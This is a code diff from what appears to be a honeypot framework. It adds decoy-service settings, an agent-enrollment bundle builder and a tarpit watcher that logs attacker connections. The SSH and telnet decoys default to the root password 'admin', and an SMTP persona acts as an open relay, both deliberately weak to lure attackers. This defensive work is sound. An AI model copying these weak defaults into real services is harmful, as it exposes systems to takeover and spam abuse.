@@ -28,7 +28,7 @@ def _load_plugins() -> None: for cls in BaseService.__subclasses__(): if not cls.__module__.startswith("decnet.services."): continue - instance = cls() + instance = cls() # type: ignore[abstract] _registry[instance.name] = instance _loaded = True diff --git a/decnet/services/sip.py b/decnet/services/sip.py index 05665396..27eb5c5d 100644 --- a/decnet/services/sip.py +++ b/decnet/services/sip.py @@ -8,6 +8,7 @@ class SIPService(BaseService): name = "sip" ports = [5060] default_image = "build" + # config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict: fragment: dict = { diff --git a/decnet/services/smb.py b/decnet/services/smb.py index f6a43caa..ae7ea185 100644 --- a/decnet/services/smb.py +++ b/decnet/services/smb.py @@ -8,6 +8,7 @@ class SMBService(BaseService): name = "smb" ports = [445, 139] default_image = "build" + # config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict: fragment: dict = { diff --git a/decnet/services/smtp.py b/decnet/services/smtp.py index b2005ab7..266e4f47 100644 --- a/decnet/services/smtp.py +++ b/decnet/services/smtp.py @@ -1,7 +1,7 @@ import os from pathlib import Path -from decnet.services.base import BaseService +from decnet.services.base import BaseService, ServiceConfigField TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "smtp" ARTIFACTS_ROOT = os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts") @@ -16,6 +16,24 @@ class SMTPService(BaseService): ports = [25, 587] default_image = "build" + config_schema = [ + ServiceConfigField( + key="banner", + label="SMTP greeting banner", + type="string", + placeholder="mail.corp.local ESMTP Postfix", + help="First line returned on TCP connect (220 ...).", + ), + ServiceConfigField( + key="mta", + label="MTA persona", + type="enum", + enum=["postfix", "exim", "sendmail"], + default="postfix", + help="Shapes EHLO capability list and error wording.", + ), + ] + def compose_fragment( self, decky_name: str, diff --git a/decnet/services/smtp_relay.py b/decnet/services/smtp_relay.py index 929ccedc..9cd551fb 100644 --- a/decnet/services/smtp_relay.py +++ b/decnet/services/smtp_relay.py @@ -1,7 +1,7 @@ import os from pathlib import Path -from decnet.services.base import BaseService +from decnet.services.base import BaseService, ServiceConfigField # Reuses the same template as the smtp service — only difference is # SMTP_OPEN_RELAY=1 in the environment, which enables the open relay persona. @@ -18,6 +18,64 @@ class SMTPRelayService(BaseService): ports = [25, 587] default_image = "build" + config_schema = [ + ServiceConfigField( + key="banner", + label="SMTP greeting banner", + type="string", + placeholder="mail.corp.local ESMTP Postfix", + help="First line returned on TCP connect (220 ...).", + ), + ServiceConfigField( + key="mta", + label="MTA persona", + type="enum", + enum=["postfix", "exim", "sendmail"], + default="postfix", + help="Shapes EHLO capability list and error wording.", + ), + ServiceConfigField( + key="upstream_host", + label="Upstream relay host", + type="string", + placeholder="smtp.sendgrid.net", + help="Real SMTP relay used to forward probe emails. Leave blank to disable forwarding.", + ), + ServiceConfigField( + key="upstream_port", + label="Upstream relay port", + type="int", + default=25, + help="Port on the upstream relay (25 or 587).", + ), + ServiceConfigField( + key="upstream_user", + label="Upstream relay username", + type="string", + help="AUTH username for the upstream relay (optional).", + ), + ServiceConfigField( + key="upstream_pass", + label="Upstream relay password", + type="string", + help="AUTH password for the upstream relay (optional).", + ), + ServiceConfigField( + key="upstream_sender", + label="Upstream envelope sender", + type="string", + placeholder="probe@yourdomain.com", + help="Envelope MAIL FROM used when talking to the upstream relay. Set this to an address your server is authorised to send from so SPF passes at the recipient. The attacker's From: header inside the message is untouched.", + ), + ServiceConfigField( + key="probe_limit", + label="Probe forward limit", + type="int", + default=1, + help="Number of emails per source IP to actually deliver upstream. All subsequent emails are silently quarantined.", + ), + ] + def compose_fragment( self, decky_name: str, @@ -33,6 +91,7 @@ class SMTPRelayService(BaseService): "cap_add": ["NET_BIND_SERVICE"], "environment": { "NODE_NAME": decky_name, + "SMTP_SERVICE_NAME": "smtp_relay", "SMTP_OPEN_RELAY": "1", "SMTP_QUARANTINE_DIR": _IN_CONTAINER_QUARANTINE, }, diff --git a/decnet/services/sniffer.py b/decnet/services/sniffer.py index 5a12ea63..40a8b343 100644 --- a/decnet/services/sniffer.py +++ b/decnet/services/sniffer.py @@ -16,6 +16,7 @@ class SnifferService(BaseService): name = "sniffer" ports: list[int] = [] default_image = "build" + # config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads fleet_singleton = True def compose_fragment( diff --git a/decnet/services/snmp.py b/decnet/services/snmp.py index 0e67ce84..9ce6424e 100644 --- a/decnet/services/snmp.py +++ b/decnet/services/snmp.py @@ -8,6 +8,7 @@ class SNMPService(BaseService): name = "snmp" ports = [161] default_image = "build" + # config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict: fragment: dict = { diff --git a/decnet/services/ssh.py b/decnet/services/ssh.py index c5fd8078..81736401 100644 --- a/decnet/services/ssh.py +++ b/decnet/services/ssh.py @@ -1,7 +1,7 @@ import os from pathlib import Path -from decnet.services.base import BaseService +from decnet.services.base import BaseService, ServiceConfigField TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "ssh" ARTIFACTS_ROOT = os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts") @@ -25,6 +25,27 @@ class SSHService(BaseService): ports = [22] default_image = "build" + config_schema = [ + ServiceConfigField( + key="password", + label="Root password", + type="password", + default="admin", + secret=True, + help="Plaintext root password for the in-container sshd.", + ), + ServiceConfigField( + key="hostname", + label="Container hostname", + type="string", + help=( + "Cosmetic override for the SSH banner/PS1 — keeps the decoy " + "looking heterogeneous. Decky identity (NODE_NAME) is unaffected." + ), + placeholder="e.g. mail-01.corp.local", + ), + ] + def compose_fragment( self, decky_name: str, diff --git a/decnet/services/telnet.py b/decnet/services/telnet.py index 6bb03a2d..6ffef68c 100644 --- a/decnet/services/telnet.py +++ b/decnet/services/telnet.py @@ -1,7 +1,7 @@ import os from pathlib import Path -from decnet.services.base import BaseService +from decnet.services.base import BaseService, ServiceConfigField TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "telnet" ARTIFACTS_ROOT = os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts") @@ -24,6 +24,27 @@ class TelnetService(BaseService): ports = [23] default_image = "build" + config_schema = [ + ServiceConfigField( + key="password", + label="Root password", + type="password", + default="admin", + secret=True, + help="Plaintext root password for the in-container telnetd.", + ), + ServiceConfigField( + key="hostname", + label="Container hostname", + type="string", + placeholder="e.g. mail-01.corp.local", + help=( + "Cosmetic override for the telnet banner — keeps decoys " + "looking heterogeneous. Decky identity (NODE_NAME) is unaffected." + ), + ), + ] + def compose_fragment( self, decky_name: str, diff --git a/decnet/services/tftp.py b/decnet/services/tftp.py index a51ba7fc..75cbd94f 100644 --- a/decnet/services/tftp.py +++ b/decnet/services/tftp.py @@ -8,6 +8,7 @@ class TFTPService(BaseService): name = "tftp" ports = [69] default_image = "build" + # config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict: fragment: dict = { diff --git a/decnet/services/vnc.py b/decnet/services/vnc.py index 0c5834e2..239765be 100644 --- a/decnet/services/vnc.py +++ b/decnet/services/vnc.py @@ -8,6 +8,7 @@ class VNCService(BaseService): name = "vnc" ports = [5900] default_image = "build" + # config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict: fragment: dict = { diff --git a/decnet/swarm/bundle_builder.py b/decnet/swarm/bundle_builder.py new file mode 100644 index 00000000..bda76d4c --- /dev/null +++ b/decnet/swarm/bundle_builder.py @@ -0,0 +1,209 @@ +"""Tarball + bootstrap construction for agent-enrollment bundles. + +Pure I/O, no FastAPI dependency — independently testable. +""" +from __future__ import annotations + +import io +import os +import pathlib +import tarfile +from datetime import datetime, timezone +from typing import Optional + +from decnet.swarm import pki + +# --------------------------------------------------------------------------- +# Include / exclude manifest +# --------------------------------------------------------------------------- + +# Explicit include list — fails closed. Stray files on the master +# (dev venvs, .env files, editor scratch) cannot leak into the bundle. +_INCLUDED_ROOT_FILES: tuple[str, ...] = ("pyproject.toml",) +_INCLUDED_DIRS: tuple[str, ...] = ("decnet",) + +# Subtrees of _INCLUDED_DIRS that must NOT ship (relative to repo root). +# * decnet/web — FastAPI master app, unused on agents. +# * decnet/mutator — swarm-wide respawn scheduler, master-only. +# * decnet/profiler — rebuilds profiles against master DB, master-only. +_EXCLUDED_DECNET_SUBTREES: frozenset[str] = frozenset({ + "decnet/web", + "decnet/mutator", + "decnet/profiler", +}) + +# Agent-side systemd units. Profiler stays master-side intentionally. +_SYSTEMD_UNITS = ( + "decnet-agent", "decnet-forwarder", "decnet-engine", "decnet-updater", + "decnet-collector", "decnet-prober", "decnet-sniffer", +) + + +# --------------------------------------------------------------------------- +# Path helpers +# --------------------------------------------------------------------------- + +def _repo_root() -> pathlib.Path: + # decnet/swarm/bundle_builder.py -> parents[2] = repo root. + return pathlib.Path(__file__).resolve().parents[2] + + +def _templates_dir() -> pathlib.Path: + return pathlib.Path(__file__).resolve().parents[1] / "web" / "templates" + + +# --------------------------------------------------------------------------- +# Filesystem walk +# --------------------------------------------------------------------------- + +def _iter_included(root: pathlib.Path) -> list[tuple[pathlib.Path, str]]: + """Return ``(full_path, arcname)`` pairs for every file the agent needs. + + Walk is pruned in-place: ``__pycache__`` and master-only subtrees are + skipped at directory level so we never descend into them. + """ + found: list[tuple[pathlib.Path, str]] = [] + + for rel in _INCLUDED_ROOT_FILES: + p = root / rel + if p.is_file(): + found.append((p, rel)) + + for top in _INCLUDED_DIRS: + start = root / top + if not start.is_dir(): + continue + for dirpath, dirnames, filenames in os.walk(start, topdown=True, followlinks=False): + dir_path = pathlib.Path(dirpath) + rel_dir = dir_path.relative_to(root).as_posix() + + dirnames[:] = [ + d for d in dirnames + if d != "__pycache__" + and f"{rel_dir}/{d}" not in _EXCLUDED_DECNET_SUBTREES + ] + + for fn in filenames: + if fn.endswith((".pyc", ".pyo")): + continue + full = dir_path / fn + if full.is_symlink(): + continue + found.append((full, f"{rel_dir}/{fn}")) + + found.sort(key=lambda t: t[1]) + return found + + +# --------------------------------------------------------------------------- +# Content renderers +# --------------------------------------------------------------------------- + +def _render_decnet_ini( + master_host: str, + host_uuid: str, + use_ipvlan: bool = False, + swarmctl_port: int = 8770, +) -> bytes: + ipvlan_line = f"ipvlan = {'true' if use_ipvlan else 'false'}\n" + return ( + "; Generated by DECNET agent-enrollment bundle.\n" + "[decnet]\n" + "mode = agent\n" + "disallow-master = true\n" + "log-directory = /var/log/decnet\n" + f"{ipvlan_line}" + "\n" + "[agent]\n" + f"master-host = {master_host}\n" + f"swarmctl-port = {swarmctl_port}\n" + "swarm-syslog-port = 6514\n" + "agent-port = 8765\n" + "agent-dir = /etc/decnet/agent\n" + "updater-dir = /etc/decnet/updater\n" + f"host-uuid = {host_uuid}\n" + ).encode() + + +def _add_bytes(tar: tarfile.TarFile, name: str, data: bytes, mode: int = 0o644) -> None: + info = tarfile.TarInfo(name) + info.size = len(data) + info.mode = mode + info.mtime = int(datetime.now(timezone.utc).timestamp()) + tar.addfile(info, io.BytesIO(data)) + + +def _render_systemd_unit(name: str, agent_name: str, master_host: str) -> bytes: + tpl_path = _templates_dir() / f"{name}.service.j2" + tpl = tpl_path.read_text() + return ( + tpl.replace("{{ agent_name }}", agent_name) + .replace("{{ master_host }}", master_host) + ).encode() + + +def render_bootstrap( + agent_name: str, + master_host: str, + tarball_url: str, + expires_at: datetime, + with_updater: bool, +) -> bytes: + tpl_path = _templates_dir() / "enroll_bootstrap.sh.j2" + tpl = tpl_path.read_text() + now = datetime.now(timezone.utc).replace(microsecond=0).isoformat() + rendered = ( + tpl.replace("{{ agent_name }}", agent_name) + .replace("{{ master_host }}", master_host) + .replace("{{ tarball_url }}", tarball_url) + .replace("{{ generated_at }}", now) + .replace("{{ expires_at }}", expires_at.replace(microsecond=0).isoformat()) + .replace("{{ with_updater }}", "true" if with_updater else "false") + ) + return rendered.encode() + + +# --------------------------------------------------------------------------- +# Public API +# --------------------------------------------------------------------------- + +def build_tarball( + master_host: str, + agent_name: str, + host_uuid: str, + issued: pki.IssuedCert, + services_ini: Optional[str], + updater_issued: Optional[pki.IssuedCert] = None, + use_ipvlan: bool = False, +) -> bytes: + """Return a gzipped tarball ready to be handed to the enrolling agent.""" + root = _repo_root() + buf = io.BytesIO() + with tarfile.open(fileobj=buf, mode="w:gz") as tar: + for path, arcname in _iter_included(root): + tar.add(path, arcname=arcname, recursive=False) + + _add_bytes( + tar, + "etc/decnet/decnet.ini", + _render_decnet_ini(master_host, host_uuid, use_ipvlan), + ) + for unit in _SYSTEMD_UNITS: + _add_bytes( + tar, + f"etc/systemd/system/{unit}.service", + _render_systemd_unit(unit, agent_name, master_host), + ) + _add_bytes(tar, "home/.decnet/agent/ca.crt", issued.ca_cert_pem) + _add_bytes(tar, "home/.decnet/agent/worker.crt", issued.cert_pem) + _add_bytes(tar, "home/.decnet/agent/worker.key", issued.key_pem, mode=0o600) + + if updater_issued is not None: + _add_bytes(tar, "home/.decnet/updater/ca.crt", updater_issued.ca_cert_pem) + _add_bytes(tar, "home/.decnet/updater/updater.crt", updater_issued.cert_pem) + _add_bytes(tar, "home/.decnet/updater/updater.key", updater_issued.key_pem, mode=0o600) + + if services_ini: + _add_bytes(tar, "services.ini", services_ini.encode()) + + return buf.getvalue() diff --git a/decnet/tarpit/__init__.py b/decnet/tarpit/__init__.py new file mode 100644 index 00000000..7a8aa286 --- /dev/null +++ b/decnet/tarpit/__init__.py @@ -0,0 +1,3 @@ +from .worker import tarpit_watcher_worker + +__all__ = ["tarpit_watcher_worker"] diff --git a/decnet/tarpit/worker.py b/decnet/tarpit/worker.py new file mode 100644 index 00000000..d0f60340 --- /dev/null +++ b/decnet/tarpit/worker.py @@ -0,0 +1,208 @@ +"""Tarpit connection watcher — edge-triggered enter/exit log events. + +Polls active tarpit rules every ``DECNET_TARPIT_POLL_INTERVAL`` seconds +(default 15). For each rule, reads ``/proc/{pid}/net/tcp`` on the host +(no docker exec, no ss needed inside the container) to find ESTABLISHED +connections on the tarpitted ports. Emits structured log events: + +* ``tarpit_enter`` — new connection seen on a tarpitted port +* ``tarpit_exit`` — connection gone; includes elapsed time in seconds + +Runs embedded in the API process (always-on, near-zero cost when no +rules exist). +""" +from __future__ import annotations + +import asyncio +import json +import socket +from datetime import datetime, timezone +from typing import Any, Optional + +from decnet.decky_io.resolve import resolve_decky_container +from decnet.logging import get_logger +from decnet.network import get_container_pid +from decnet.web.db.repository import BaseRepository + +log = get_logger("tarpit.watcher") + +_POLL_INTERVAL_ENV = "DECNET_TARPIT_POLL_INTERVAL" +_DEFAULT_POLL_S = 15 + +_TCP_ESTABLISHED = "01" + + +def _read_proc_net_tcp(pid: int) -> str: + """Read /proc/{pid}/net/tcp from the host (namespace-aware symlink).""" + path = f"/proc/{pid}/net/tcp" + try: + with open(path) as f: + return f.read() + except OSError: + return "" + + +def _parse_connections(content: str, target_port: int) -> list[str]: + """Return list of remote IPs in ESTABLISHED state on target_port.""" + ips: list[str] = [] + for line in content.strip().splitlines()[1:]: + parts = line.split() + if len(parts) < 4: + continue + local_hex, rem_hex, state = parts[1], parts[2], parts[3] + if state != _TCP_ESTABLISHED: + continue + local_port = int(local_hex.split(":")[1], 16) + if local_port != target_port: + continue + rem_ip_hex = rem_hex.split(":")[0] + try: + ip_bytes = bytes.fromhex(rem_ip_hex)[::-1] + ip = socket.inet_ntoa(ip_bytes) + except (ValueError, OSError): + continue + if ip != "0.0.0.0": # nosec B104 + ips.append(ip) + return ips + + +def _get_poll_interval() -> int: + import os + try: + return int(os.environ.get(_POLL_INTERVAL_ENV, _DEFAULT_POLL_S)) + except (TypeError, ValueError): + return _DEFAULT_POLL_S + + +async def _get_attacker_uuid(repo: BaseRepository, ip: str) -> Optional[str]: + try: + from decnet.web.db.models import Attacker + from sqlalchemy import select + async with repo._session() as session: # type: ignore[attr-defined] + result = await session.execute( + select(Attacker).where(Attacker.ip == ip) # type: ignore[arg-type] + ) + row = result.scalar_one_or_none() + return row.uuid if row else None + except Exception: + return None + + +async def _emit_log( + repo: BaseRepository, + *, + event_type: str, + decky_name: str, + src_ip: str, + port: int, + extra: dict[str, Any] | None = None, +) -> None: + attacker_uuid = await _get_attacker_uuid(repo, src_ip) + fields: dict[str, Any] = {"port": port, "attacker_uuid": attacker_uuid} + if extra: + fields.update(extra) + try: + await repo.add_log({ + "decky": decky_name, + "service": "tarpit", + "event_type": event_type, + "attacker_ip": src_ip, + "raw_line": f"tarpit {event_type} src={src_ip} decky={decky_name} port={port}", + "fields": json.dumps(fields), + }) + except Exception as exc: + log.warning("tarpit log emit failed: %s", exc) + + +async def tarpit_watcher_worker(repo: BaseRepository) -> None: + """Main loop — runs forever, wakes every DECNET_TARPIT_POLL_INTERVAL seconds.""" + poll_interval = _get_poll_interval() + log.info("tarpit watcher started poll_interval=%ds", poll_interval) + + # (decky_name, src_ip, port) → first_seen timestamp + seen: dict[tuple[str, str, int], datetime] = {} + + while True: + try: + await _tick(repo, seen) + except asyncio.CancelledError: + raise + except Exception as exc: + log.warning("tarpit watcher tick error: %s", exc) + await asyncio.sleep(poll_interval) + + +async def _tick( + repo: BaseRepository, + seen: dict[tuple[str, str, int], datetime], +) -> None: + rules = await repo.list_tarpit_rules() + if not rules: + # No active tarpit rules — clear stale seen state and bail early. + seen.clear() + return + + current: set[tuple[str, str, int]] = set() + + for rule in rules: + db_key: str = rule["decky_name"] + ports: list[int] = rule["ports"] + + # Topology deckies are stored as "t:{topology_id}:{decky_name}". + # Resolve the real container name before asking Docker for its PID. + if db_key.startswith("t:"): + _, topology_id, decky_name = db_key.split(":", 2) + try: + container = await resolve_decky_container( + repo, decky_name, topology_id=topology_id, + ) + except LookupError as exc: + log.debug("tarpit watcher: %s", exc) + continue + else: + decky_name = db_key + container = db_key + + try: + pid = await asyncio.to_thread(get_container_pid, container) + except LookupError as exc: + log.debug("tarpit watcher: %s", exc) + continue + + tcp_content = await asyncio.to_thread(_read_proc_net_tcp, pid) + + for port in ports: + for src_ip in _parse_connections(tcp_content, port): + key = (decky_name, src_ip, port) + current.add(key) + if key not in seen: + seen[key] = datetime.now(timezone.utc) + log.info( + "tarpit enter decky=%s src=%s port=%d", + decky_name, src_ip, port, + ) + await _emit_log( + repo, + event_type="tarpit_enter", + decky_name=decky_name, + src_ip=src_ip, + port=port, + ) + + for key in list(seen): + if key not in current: + first_seen = seen.pop(key) + elapsed = int((datetime.now(timezone.utc) - first_seen).total_seconds()) + decky_name, src_ip, port = key + log.info( + "tarpit exit decky=%s src=%s port=%d elapsed=%ds", + decky_name, src_ip, port, elapsed, + ) + await _emit_log( + repo, + event_type="tarpit_exit", + decky_name=decky_name, + src_ip=src_ip, + port=port, + extra={"duration_s": elapsed}, + ) diff --git a/decnet/telemetry.py b/decnet/telemetry.py index 042440cc..a0f04a63 100644 --- a/decnet/telemetry.py +++ b/decnet/telemetry.py @@ -138,7 +138,7 @@ def traced(fn: F) -> F: ... def traced(name: str) -> Callable[[F], F]: ... -def traced(fn: Any = None, *, name: str | None = None) -> Any: +def traced(fn: Any = None, *, name: str | None = None) -> Any: # type: ignore[misc] """Decorator that wraps a function in an OTEL span. Usage:: @@ -168,9 +168,9 @@ def traced(fn: Any = None, *, name: str | None = None) -> Any: # Called as @traced (no arguments) return _wrap(fn, None) # Fallback: @traced() with no args - def decorator(f: F) -> F: + def _fallback_decorator(f: F) -> F: return _wrap(f, name) - return decorator + return _fallback_decorator def _wrap(fn: F, span_name: str | None) -> F: diff --git a/decnet/templates/_shared/ntlmssp.py b/decnet/templates/_shared/ntlmssp.py index b0271a9a..95db7c66 100644 --- a/decnet/templates/_shared/ntlmssp.py +++ b/decnet/templates/_shared/ntlmssp.py @@ -120,7 +120,7 @@ def parse_type3(blob: bytes) -> Optional[dict]: if domain: principal = f"{domain}\\{username}" else: - principal = username or None + principal = username return { "username": username, diff --git a/decnet/templates/conpot/entrypoint.py b/decnet/templates/conpot/entrypoint.py index 59b9b99b..891910d5 100644 --- a/decnet/templates/conpot/entrypoint.py +++ b/decnet/templates/conpot/entrypoint.py @@ -128,6 +128,9 @@ def main(): signal.signal(signal.SIGINT, _forward) try: + if proc.stdout is None: + proc.wait() + return for raw_line in proc.stdout: line = raw_line.rstrip() if not line: diff --git a/decnet/templates/conpot/syslog_bridge.py b/decnet/templates/conpot/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/conpot/syslog_bridge.py +++ b/decnet/templates/conpot/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. """ import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/docker_api/syslog_bridge.py b/decnet/templates/docker_api/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/docker_api/syslog_bridge.py +++ b/decnet/templates/docker_api/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. """ import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/elasticsearch/server.py b/decnet/templates/elasticsearch/server.py index 7d2b0d75..6f18c48d 100644 --- a/decnet/templates/elasticsearch/server.py +++ b/decnet/templates/elasticsearch/server.py @@ -94,7 +94,7 @@ class ESHandler(BaseHTTPRequestHandler): server_version = "elasticsearch" sys_version = "" - def _send_json(self, code: int, data: dict) -> None: + def _send_json(self, code: int, data: dict | list) -> None: body = json.dumps(data).encode() self.send_response(code) self.send_header("Content-Type", "application/json; charset=UTF-8") diff --git a/decnet/templates/elasticsearch/syslog_bridge.py b/decnet/templates/elasticsearch/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/elasticsearch/syslog_bridge.py +++ b/decnet/templates/elasticsearch/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. """ import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/ftp/server.py b/decnet/templates/ftp/server.py index b03637d4..c2f9ed09 100644 --- a/decnet/templates/ftp/server.py +++ b/decnet/templates/ftp/server.py @@ -7,9 +7,12 @@ forwards events as JSON to LOG_TARGET if set. import os from pathlib import Path +from typing import cast from twisted.internet import defer, reactor +from twisted.internet.interfaces import IReactorTCP from twisted.protocols.ftp import FTP, FTPFactory, FTPAnonymousShell +from twisted.python.failure import Failure from twisted.python.filepath import FilePath from twisted.python import log as twisted_log @@ -95,7 +98,8 @@ _BAIT_PATH = _setup_bait_fs() class ServerFTP(FTP): def connectionMade(self): - peer = self.transport.getPeer() + assert self.transport is not None + peer = self.transport.getPeer() # type: ignore[misc] _log("connection", src_ip=peer.host, src_port=peer.port) super().connectionMade() @@ -120,15 +124,16 @@ class ServerFTP(FTP): return defer.succeed((530, "Login incorrect.")) self.state = self.AUTHED self._user = getattr(self, "_server_user", "anonymous") - self.shell = FTPAnonymousShell(FilePath(_BAIT_PATH)) + self.shell = FTPAnonymousShell(FilePath(_BAIT_PATH)) # type: ignore[assignment] return defer.succeed((230, "Login successful.")) def ftp_RETR(self, path): _log("download_attempt", path=path) return super().ftp_RETR(path) - def connectionLost(self, reason): - peer = self.transport.getPeer() + def connectionLost(self, reason: Failure) -> None: # type: ignore[override] + assert self.transport is not None + peer = self.transport.getPeer() # type: ignore[misc] _log("disconnect", src_ip=peer.host, src_port=peer.port) super().connectionLost(reason) @@ -140,5 +145,5 @@ class ServerFTPFactory(FTPFactory): if __name__ == "__main__": twisted_log.startLoggingWithObserver(lambda e: None, setStdout=False) _log("startup", msg=f"FTP server starting as {NODE_NAME} on port {PORT}") - reactor.listenTCP(PORT, ServerFTPFactory()) - reactor.run() + cast(IReactorTCP, reactor).listenTCP(PORT, ServerFTPFactory()) # type: ignore[arg-type] + reactor.run() # type: ignore[attr-defined] diff --git a/decnet/templates/ftp/syslog_bridge.py b/decnet/templates/ftp/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/ftp/syslog_bridge.py +++ b/decnet/templates/ftp/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. """ import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/http/syslog_bridge.py b/decnet/templates/http/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/http/syslog_bridge.py +++ b/decnet/templates/http/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. """ import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/https/entrypoint.sh b/decnet/templates/https/entrypoint.sh index 43019223..f88a889e 100644 --- a/decnet/templates/https/entrypoint.sh +++ b/decnet/templates/https/entrypoint.sh @@ -2,12 +2,28 @@ set -e TLS_DIR="/opt/tls" -CERT="${TLS_CERT:-$TLS_DIR/cert.pem}" -KEY="${TLS_KEY:-$TLS_DIR/key.pem}" +mkdir -p "$TLS_DIR" + +# TLS_CERT/TLS_KEY may arrive as either a host-side path OR raw PEM +# content (the wizard ships PEM textareas as decoded strings). Detect by +# looking for a PEM header; if present, write to disk and rebind the var +# to the on-disk path. +if [ -n "$TLS_CERT" ] && printf '%s' "$TLS_CERT" | grep -q 'BEGIN '; then + printf '%s' "$TLS_CERT" > "$TLS_DIR/cert.pem" + CERT="$TLS_DIR/cert.pem" +else + CERT="${TLS_CERT:-$TLS_DIR/cert.pem}" +fi +if [ -n "$TLS_KEY" ] && printf '%s' "$TLS_KEY" | grep -q 'BEGIN '; then + printf '%s' "$TLS_KEY" > "$TLS_DIR/key.pem" + chmod 600 "$TLS_DIR/key.pem" + KEY="$TLS_DIR/key.pem" +else + KEY="${TLS_KEY:-$TLS_DIR/key.pem}" +fi # Generate a self-signed certificate if none exists if [ ! -f "$CERT" ] || [ ! -f "$KEY" ]; then - mkdir -p "$TLS_DIR" CN="${TLS_CN:-${NODE_NAME:-localhost}}" openssl req -x509 -newkey rsa:2048 -nodes \ -keyout "$KEY" -out "$CERT" \ @@ -15,4 +31,8 @@ if [ ! -f "$CERT" ] || [ ! -f "$KEY" ]; then 2>/dev/null fi +# server.py reads TLS_CERT/TLS_KEY as filesystem paths. +export TLS_CERT="$CERT" +export TLS_KEY="$KEY" + exec python3 /opt/server.py diff --git a/decnet/templates/https/syslog_bridge.py b/decnet/templates/https/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/https/syslog_bridge.py +++ b/decnet/templates/https/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. """ import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/imap/server.py b/decnet/templates/imap/server.py index 02e19164..7546557f 100644 --- a/decnet/templates/imap/server.py +++ b/decnet/templates/imap/server.py @@ -17,6 +17,7 @@ import os import time from email.utils import getaddresses from pathlib import Path +from typing import cast from syslog_bridge import ( SEVERITY_WARNING, encode_secret, @@ -377,7 +378,7 @@ def _log(event_type: str, severity: int = 6, **kwargs) -> None: def _parse_seq_range(range_str: str, total: int) -> list[int]: """Parse IMAP sequence set ('1', '1:3', '1:*', '*') → list of 1-based indices.""" - result = [] + result: list[int] = [] for part in range_str.split(","): part = part.strip() if ":" in part: @@ -472,6 +473,9 @@ def _build_fetch_response(seq: int, msg: dict, items: list[str]) -> bytes: # ── Protocol ────────────────────────────────────────────────────────────────── class IMAPProtocol(asyncio.Protocol): + _transport: asyncio.Transport | None = None + _peer: tuple[str, int] + def __init__(self): self._transport = None self._peer = ("?", 0) @@ -479,12 +483,12 @@ class IMAPProtocol(asyncio.Protocol): self._state = 